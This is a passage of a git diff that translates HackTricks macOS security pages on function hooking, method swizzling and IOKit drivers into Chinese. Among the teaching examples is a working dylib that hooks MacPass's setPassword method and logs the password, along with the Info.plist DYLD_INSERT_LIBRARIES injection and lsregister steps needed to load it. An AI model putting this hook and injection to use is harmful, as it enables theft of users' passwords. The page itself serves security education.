= printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } DYLD_INTERPOSE(my_printf,printf); ``` - {{#endtab}} {{#endtabs}} - ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello Hello from interpose @@ -84,24 +77,22 @@ Hello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose ``` +## 方法交换 -## Method Swizzling +在 ObjectiveC 中,方法调用的方式是:**`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** -In ObjectiveC this is how a method is called like: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** +需要 **对象**、**方法**和 **参数**。当调用一个方法时,使用函数 **`objc_msgSend`** 发送 **msg**:`int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` -It's needed the **object**, the **method** and the **params**. And when a method is called a **msg is sent** using the function **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` +对象是 **`someObject`**,方法是 **`@selector(method1p1:p2:)`**,参数是 **value1**,**value2**。 -The object is **`someObject`**, the method is **`@selector(method1p1:p2:)`** and the arguments are **value1**, **value2**. - -Following the object structures, it's possible to reach an **array of methods** where the **names** and **pointers** to the method code are **located**. +根据对象结构,可以访问一个 **方法数组**,其中 **名称** 和 **指向方法代码的指针** 被 **存放**。 > [!CAUTION] -> Note that because methods and classes are accessed based on their names, this information is store in the binary, so it's possible to retrieve it with `otool -ov ` or [`class-dump `](https://github.com/nygard/class-dump) +> 请注意,由于方法和类是根据其名称访问的,因此这些信息存储在二进制文件中,因此可以使用 `otool -ov ` 或 [`class-dump `](https://github.com/nygard/class-dump) 检索它。 -### Accessing the raw methods - -It's possible to access the information of the methods such as name, number of params or address like in the following example: +### 访问原始方法 +可以访问方法的信息,例如名称、参数数量或地址,如以下示例所示: ```objectivec // gcc -framework Foundation test.m -o test @@ -110,71 +101,69 @@ It's possible to access the information of the methods such as name, number of p #import int main() { - // Get class of the variable - NSString* str = @"This is an example"; - Class strClass = [str class]; - NSLog(@"str's Class name: %s", class_getName(strClass)); +// Get class of the variable +NSString* str = @"This is an example"; +Class strClass = [str class]; +NSLog(@"str's Class name: %s", class_getName(strClass)); - // Get parent class of a class - Class strSuper = class_getSuperclass(strClass); - NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); +// Get parent class of a class +Class strSuper = class_getSuperclass(strClass); +NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); - // Get information about a method - SEL sel = @selector(length); - NSLog(@"Selector name: %@", NSStringFromSelector(sel)); - Method m = class_getInstanceMethod(strClass,sel); - NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); - NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); +// Get information about a method +SEL sel = @selector(length); +NSLog(@"Selector name: %@", NSStringFromSelector(sel)); +Method m = class_getInstanceMethod(strClass,sel); +NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); +NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); - // Iterate through the class hierarchy - NSLog(@"Listing methods:"); - Class currentClass = strClass; - while (currentClass != NULL) { - unsigned int inheritedMethodCount = 0; - Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); +// Iterate through the class hierarchy +NSLog(@"Listing methods:"); +Class currentClass = strClass; +while (currentClass != NULL) { +unsigned int inheritedMethodCount = 0; +Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); - NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); +NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); - for (unsigned int i = 0; i < inheritedMethodCount; i++) { - Method method = inheritedMethods[i]; - SEL selector = method_getName(method); - const char* methodName = sel_getName(selector); - unsigned long address = (unsigned long)method_getImplementation(m); - NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); - } +for (unsigned int i = 0; i < inheritedMethodCount; i++) { +Method method = inheritedMethods[i]; +SEL selector = method_getName(method); +const char* methodName = sel_getName(selector); +unsigned long address = (unsigned long)method_getImplementation(m); +NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); +} - // Free the memory allocated by class_copyMethodList - free(inheritedMethods); - currentClass = class_getSuperclass(currentClass); - } +// Free the memory allocated by class_copyMethodList +free(inheritedMethods); +currentClass = class_getSuperclass(currentClass); +} - // Other ways to call uppercaseString method - if([str respondsToSelector:@selector(uppercaseString)]) { - NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; - NSLog(@"Uppercase string: %@", uppercaseString); - } +// Other ways to call uppercaseString method +if([str respondsToSelector:@selector(uppercaseString)]) { +NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; +NSLog(@"Uppercase string: %@", uppercaseString); +} - // Using objc_msgSend directly - NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); - NSLog(@"Uppercase string: %@", uppercaseString2); +// Using objc_msgSend directly +NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); +NSLog(@"Uppercase string: %@", uppercaseString2); - // Calling the address directly - IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address - NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp - NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method - NSLog(@"Uppercase string: %@", uppercaseString3); +// Calling the address directly +IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address +NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp +NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method +NSLog(@"Uppercase string: %@", uppercaseString3); - return 0; +return 0; } ``` +### 方法交换与 method_exchangeImplementations -### Method Swizzling with method_exchangeImplementations - -The function **`method_exchangeImplementations`** allows to **change** the **address** of the **implementation** of **one function for the other**. +函数 **`method_exchangeImplementations`** 允许 **更改** **一个函数的实现地址为另一个函数的实现**。 > [!CAUTION] -> So when a function is called what is **executed is the other one**. - +> 因此,当调用一个函数时,**执行的是另一个函数**。 ```objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str @@ -192,44 +181,42 @@ The function **`method_exchangeImplementations`** allows to **change** the **add @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); +NSLog(@"Custom implementation of substringFromIndex:"); - // Call the original method - return [self swizzledSubstringFromIndex:from]; +// Call the original method +return [self swizzledSubstringFromIndex:from]; } @end int main(int argc, const char * argv[]) { - // Perform method swizzling - Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); - Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); - method_exchangeImplementations(originalMethod, swizzledMethod); +// Perform method swizzling +Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); +Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); +method_exchangeImplementations(originalMethod, swizzledMethod); - // We changed the address of one method for the other - // Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex - // And when swizzledSubstringFromIndex is called, substringFromIndex is really colled +// We changed the address of one method for the other +// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex +// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); - return 0; +return 0; } ``` - > [!WARNING] -> In this case if the **implementation code of the legit** method **verifies** the **method** **name** it could **detect** this swizzling and prevent it from running. +> 在这种情况下,如果**合法**方法的**实现代码**对**方法**的**名称**进行**验证**,它可能会**检测**到这种交换并阻止其运行。 > -> The following technique doesn't have this restriction. +> 以下技术没有这个限制。 -### Method Swizzling with method_setImplementation +### 使用 method_setImplementation 进行方法交换 -The previous format is weird because you are changing the implementation of 2 methods one from the other. Using the function **`method_setImplementation`** you can **change** the **implementation** of a **method for the other one**. - -Just remember to **store the address of the implementation of the original one** if you are going to to call it from the new implementation before overwriting it because later it will be much complicated to locate that address. +之前的格式很奇怪,因为你正在将两个方法的实现互相更改。使用函数 **`method_setImplementation`**,你可以**更改**一个**方法的实现为另一个**。 +只需记住,如果你打算在覆盖之前从新实现中调用原始实现,请**存储原始实现的地址**,因为稍后定位该地址会更加复杂。 ```objectivec #import #import @@ -246,75 +233,69 @@ static IMP original_substringFromIndex = NULL; @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); +NSLog(@"Custom implementation of substringFromIndex:"); - // Call the original implementation using objc_msgSendSuper - return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); +// Call the original implementation using objc_msgSendSuper +return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); } @end int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get the class of the target method - Class stringClass = [NSString class]; +@autoreleasepool { +// Get the class of the target method +Class stringClass = [NSString class]; - // Get the swizzled and original methods - Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); +// Get the swizzled and original methods +Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); - // Get the function pointer to the swizzled method's implementation - IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); +// Get the function pointer to the swizzled method's implementation +IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); - // Swap the implementations - // It return the now overwritten implementation of the original method to store it - original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); +// Swap the implementations +// It return the now overwritten implementation of the original method to store it +original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); - // Set the original implementation back - method_setImplementation(originalMethod, original_substringFromIndex); +// Set the original implementation back +method_setImplementation(originalMethod, original_substringFromIndex); - return 0; - } +return 0; +} } ``` - ## Hooking Attack Methodology -In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**. +在本页中讨论了不同的函数钩取方法。然而,它们涉及到**在进程内部运行代码进行攻击**。 -In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld_insert_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). +为了做到这一点,最简单的技术是通过环境变量或劫持来注入一个[Dyld](../macos-dyld-hijacking-and-dyld_insert_libraries.md)。不过,我想这也可以通过[Dylib 进程注入](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port)来完成。 -However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations. +然而,这两种选项都**限制**于**未保护**的二进制文件/进程。检查每种技术以了解更多关于限制的信息。 -However, a function hooking attack is very specific, an attacker will do this to **steal sensitive information from inside a process** (if not you would just do a process injection attack). And this sensitive information might be located in user downloaded Apps such as MacPass. - -So the attacker vector would be to either find a vulnerability or strip the signature of the application, inject the **`DYLD_INSERT_LIBRARIES`** env variable through the Info.plist of the application adding something like: +然而,函数钩取攻击是非常具体的,攻击者会这样做以**从进程内部窃取敏感信息**(否则你只会进行进程注入攻击)。这些敏感信息可能位于用户下载的应用程序中,例如 MacPass。 +因此,攻击者的途径是找到一个漏洞或去掉应用程序的签名,通过应用程序的 Info.plist 注入**`DYLD_INSERT_LIBRARIES`**环境变量,添加类似于: ```xml LSEnvironment - DYLD_INSERT_LIBRARIES - /Applications/Application.app/Contents/malicious.dylib +DYLD_INSERT_LIBRARIES +/Applications/Application.app/Contents/malicious.dylib ``` - -and then **re-register** the application: - +然后**重新注册**应用程序: ```bash /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app ``` - -Add in that library the hooking code to exfiltrate the information: Passwords, messages... +在该库中添加钩子代码以提取信息:密码、消息... > [!CAUTION] -> Note that in newer versions of macOS if you **strip the signature** of the application binary and it was previously executed, macOS **won't be executing the application** anymore. - -#### Library example +> 请注意,在较新版本的 macOS 中,如果您 **剥离应用程序二进制文件的签名** 并且它之前已被执行,macOS **将不再执行该应用程序**。 +#### 库示例 ```objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib @@ -331,27 +312,26 @@ static IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL) { - // Function that will log the password and call the original setPassword(pass, file_path) method - NSLog(@"[+] Password is: %@", password); +// Function that will log the password and call the original setPassword(pass, file_path) method +NSLog(@"[+] Password is: %@", password); - // After logging the password call the original method so nothing breaks. - return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); +// After logging the password call the original method so nothing breaks. +return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); } // Library constructor to execute __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { - // Get the real method address to not lose it - Class classMPDocument = NSClassFromString(@"MPDocument"); - Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); +// Get the real method address to not lose it +Class classMPDocument = NSClassFromString(@"MPDocument"); +Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); - // Make the original method setPassword call the fake implementation one - IMP fake_IMP = (IMP)custom_setPassword; - real_setPassword = method_setImplementation(real_Method, fake_IMP); +// Make the original method setPassword call the fake implementation one +IMP fake_IMP = (IMP)custom_setPassword; +real_setPassword = method_setImplementation(real_Method, fake_IMP); } ``` - -## References +## 参考 - [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md index 5381cb0d0..55035ee9f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md @@ -2,18 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +I/O Kit 是一个开源的面向对象的 **设备驱动框架**,位于 XNU 内核中,处理 **动态加载的设备驱动程序**。它允许在运行时将模块化代码添加到内核中,支持多种硬件。 -IOKit drivers will basically **export functions from the kernel**. These function parameter **types** are **predefined** and are verified. Moreover, similar to XPC, IOKit is just another layer on **top of Mach messages**. +IOKit 驱动程序基本上会 **从内核导出函数**。这些函数参数的 **类型** 是 **预定义的** 并经过验证。此外,类似于 XPC,IOKit 只是 **Mach 消息** 之上的另一层。 -**IOKit XNU kernel code** is opensourced by Apple in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Moreover, the user space IOKit components are also opensource [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser). +**IOKit XNU 内核代码** 由 Apple 在 [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit) 开源。此外,用户空间的 IOKit 组件也开源 [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser)。 -However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](./#ipsw)**.** - -It's written in **C++**. You can get demangled C++ symbols with: +然而,**没有 IOKit 驱动程序** 是开源的。无论如何,偶尔会发布带有符号的驱动程序,这使得调试变得更容易。查看如何 [**从固件获取驱动程序扩展这里**](./#ipsw)**。** +它是用 **C++** 编写的。您可以使用以下命令获取去除修饰的 C++ 符号: ```bash # Get demangled symbols nm -C com.apple.driver.AppleJPEGDriver @@ -23,210 +22,193 @@ c++filt __ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaquePK28IOExternalMethodDispatch2022mP8OSObjectPv IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) ``` - > [!CAUTION] -> IOKit **exposed functions** could perform **additional security checks** when a client tries to call a function but note that the apps are usually **limited** by the **sandbox** to which IOKit functions they can interact with. +> IOKit **暴露的函数** 可能在客户端尝试调用函数时执行 **额外的安全检查**,但请注意,应用程序通常受到 **沙箱** 的 **限制**,只能与特定的 IOKit 函数进行交互。 -## Drivers +## 驱动程序 -In macOS they are located in: +在 macOS 中,它们位于: - **`/System/Library/Extensions`** - - KEXT files built into the OS X operating system. +- 内置于 OS X 操作系统的 KEXT 文件。 - **`/Library/Extensions`** - - KEXT files installed by 3rd party software +- 由第三方软件安装的 KEXT 文件 -In iOS they are located in: +在 iOS 中,它们位于: - **`/System/Library/Extensions`** - ```bash #Use kextstat to print the loaded drivers kextstat Executing: /usr/bin/kmutil showloaded No variant specified, falling back to release Index Refs Address Size Wired Name (Version) UUID - 1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> - 10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> +1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> +10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> ``` +直到数字9,列出的驱动程序**加载在地址0**。这意味着这些不是实际的驱动程序,而是**内核的一部分,无法卸载**。 -Until the number 9 the listed drivers are **loaded in the address 0**. This means that those aren't real drivers but **part of the kernel and they cannot be unloaded**. - -In order to find specific extensions you can use: - +为了找到特定的扩展,您可以使用: ```bash kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id kextfind -bundle-id -substring IOR #Search by substring in bundle-id ``` - -To load and unload kernel extensions do: - +要加载和卸载内核扩展,请执行: ```bash kextload com.apple.iokit.IOReportFamily kextunload com.apple.iokit.IOReportFamily ``` - ## IORegistry -The **IORegistry** is a crucial part of the IOKit framework in macOS and iOS which serves as a database for representing the system's hardware configuration and state. It's a **hierarchical collection of objects that represent all the hardware and drivers** loaded on the system, and their relationships to each other. - -You can get the IORegistry using the cli **`ioreg`** to inspect it from the console (specially useful for iOS). +**IORegistry** 是 macOS 和 iOS 中 IOKit 框架的一个关键部分,作为表示系统硬件配置和状态的数据库。它是一个 **层次化的对象集合,代表系统上加载的所有硬件和驱动程序**,以及它们之间的关系。 +您可以使用 cli **`ioreg`** 从控制台检查 IORegistry(对 iOS 特别有用)。 ```bash ioreg -l #List all ioreg -w 0 #Not cut lines ioreg -p #Check other plane ``` - -You could download **`IORegistryExplorer`** from **Xcode Additional Tools** from [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) and inspect the **macOS IORegistry** through a **graphical** interface. +您可以从 **Xcode 附加工具** 下载 **`IORegistryExplorer`**,并通过 **图形** 界面检查 **macOS IORegistry**。
-In IORegistryExplorer, "planes" are used to organize and display the relationships between different objects in the IORegistry. Each plane represents a specific type of relationship or a particular view of the system's hardware and driver configuration. Here are some of the common planes you might encounter in IORegistryExplorer: +在 IORegistryExplorer 中,“平面”用于组织和显示 IORegistry 中不同对象之间的关系。每个平面代表特定类型的关系或系统硬件和驱动程序配置的特定视图。以下是您可能在 IORegistryExplorer 中遇到的一些常见平面: -1. **IOService Plane**: This is the most general plane, displaying the service objects that represent drivers and nubs (communication channels between drivers). It shows the provider-client relationships between these objects. -2. **IODeviceTree Plane**: This plane represents the physical connections between devices as they are attached to the system. It is often used to visualize the hierarchy of devices connected via buses like USB or PCI. -3. **IOPower Plane**: Displays objects and their relationships in terms of power management. It can show which objects are affecting the power state of others, useful for debugging power-related issues. -4. **IOUSB Plane**: Specifically focused on USB devices and their relationships, showing the hierarchy of USB hubs and connected devices. -5. **IOAudio Plane**: This plane is for representing audio devices and their relationships within the system. +1. **IOService 平面**:这是最通用的平面,显示代表驱动程序和 nubs(驱动程序之间的通信通道)的服务对象。它显示这些对象之间的提供者-客户端关系。 +2. **IODeviceTree 平面**:该平面表示设备与系统之间的物理连接。它通常用于可视化通过 USB 或 PCI 等总线连接的设备层次结构。 +3. **IOPower 平面**:以电源管理的方式显示对象及其关系。它可以显示哪些对象影响其他对象的电源状态,便于调试与电源相关的问题。 +4. **IOUSB 平面**:专注于 USB 设备及其关系,显示 USB 集线器和连接设备的层次结构。 +5. **IOAudio 平面**:该平面用于表示音频设备及其在系统中的关系。 6. ... -## Driver Comm Code Example +## 驱动程序通信代码示例 -The following code connects to the IOKit service `"YourServiceNameHere"` and calls the function inside the selector 0. For it: - -- it first calls **`IOServiceMatching`** and **`IOServiceGetMatchingServices`** to get the service. -- It then establish a connection calling **`IOServiceOpen`**. -- And it finally calls a function with **`IOConnectCallScalarMethod`** indicating the selector 0 (the selector is the number the function you want to call has assigned). +以下代码连接到 IOKit 服务 `"YourServiceNameHere"` 并调用选择器 0 内的函数。为此: +- 首先调用 **`IOServiceMatching`** 和 **`IOServiceGetMatchingServices`** 来获取服务。 +- 然后通过调用 **`IOServiceOpen`** 建立连接。 +- 最后调用 **`IOConnectCallScalarMethod`** 函数,指示选择器 0(选择器是您要调用的函数分配的数字)。 ```objectivec #import #import int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get a reference to the service using its name - CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); - if (matchingDict == NULL) { - NSLog(@"Failed to create matching dictionary"); - return -1; - } +@autoreleasepool { +// Get a reference to the service using its name +CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); +if (matchingDict == NULL) { +NSLog(@"Failed to create matching dictionary"); +return -1; +} - // Obtain an iterator over all matching services - io_iterator_t iter; - kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to get matching services"); - return -1; - } +// Obtain an iterator over all matching services +io_iterator_t iter; +kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to get matching services"); +return -1; +} - // Get a reference to the first service (assuming it exists) - io_service_t service = IOIteratorNext(iter); - if (!service) { - NSLog(@"No matching service found"); - IOObjectRelease(iter); - return -1; - } +// Get a reference to the first service (assuming it exists) +io_service_t service = IOIteratorNext(iter); +if (!service) { +NSLog(@"No matching service found"); +IOObjectRelease(iter); +return -1; +} - // Open a connection to the service - io_connect_t connect; - kr = IOServiceOpen(service, mach_task_self(), 0, &connect); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to open service"); - IOObjectRelease(service); - IOObjectRelease(iter); - return -1; - } +// Open a connection to the service +io_connect_t connect; +kr = IOServiceOpen(service, mach_task_self(), 0, &connect); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to open service"); +IOObjectRelease(service); +IOObjectRelease(iter); +return -1; +} - // Call a method on the service - // Assume the method has a selector of 0, and takes no arguments - kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to call method"); - } +// Call a method on the service +// Assume the method has a selector of 0, and takes no arguments +kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to call method"); +} - // Cleanup - IOServiceClose(connect); - IOObjectRelease(service); - IOObjectRelease(iter); - } - return 0; +// Cleanup +IOServiceClose(connect); +IOObjectRelease(service); +IOObjectRelease(iter); +} +return 0; } ``` +还有**其他**函数可以用来调用 IOKit 函数,除了 **`IOConnectCallScalarMethod`**,还有 **`IOConnectCallMethod`**、**`IOConnectCallStructMethod`**... -There are **other** functions that can be used to call IOKit functions apart of **`IOConnectCallScalarMethod`** like **`IOConnectCallMethod`**, **`IOConnectCallStructMethod`**... +## 反向工程驱动入口点 -## Reversing driver entrypoint +您可以从 [**固件镜像 (ipsw)**](./#ipsw) 中获取这些。例如,将其加载到您喜欢的反编译器中。 -You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw). Then, load it into your favourite decompiler. - -You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function: +您可以开始反编译 **`externalMethod`** 函数,因为这是接收调用并调用正确函数的驱动函数:
-That awful call demagled means: - +那个可怕的调用去混淆意味着: ```cpp IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) ``` - -Note how in the previous definition the **`self`** param is missed, the good definition would be: - +注意在之前的定义中缺少了 **`self`** 参数,好的定义应该是: ```cpp IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) ``` - -Actually, you can find the real definition in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388): - +实际上,您可以在 [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388) 找到真实的定义: ```cpp IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments, - const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, - OSObject * target, void * reference) +const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, +OSObject * target, void * reference) ``` - -With this info you can rewrite Ctrl+Right -> `Edit function signature` and set the known types: +使用此信息,您可以重写 Ctrl+Right -> `Edit function signature` 并设置已知类型:
-The new decompiled code will look like: +新的反编译代码将如下所示:
